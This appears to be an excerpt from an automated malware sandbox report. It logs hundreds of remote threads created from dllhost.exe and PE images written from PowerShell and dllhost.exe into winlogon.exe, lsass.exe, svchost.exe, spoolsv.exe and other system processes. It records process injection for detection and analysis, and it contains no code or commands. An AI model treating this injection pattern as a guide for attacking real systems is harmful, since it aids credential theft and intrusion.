Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60312EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E2562EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4C592EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC7D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CCA02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83F12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83F42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27052EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31082EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 310B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: E5E22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4EE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC522EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC552EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 65092EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0522EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: 15D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F2842EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E612EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E642EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: D6712EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 37402EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E3D52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE072EBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B47B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20870060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17184260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
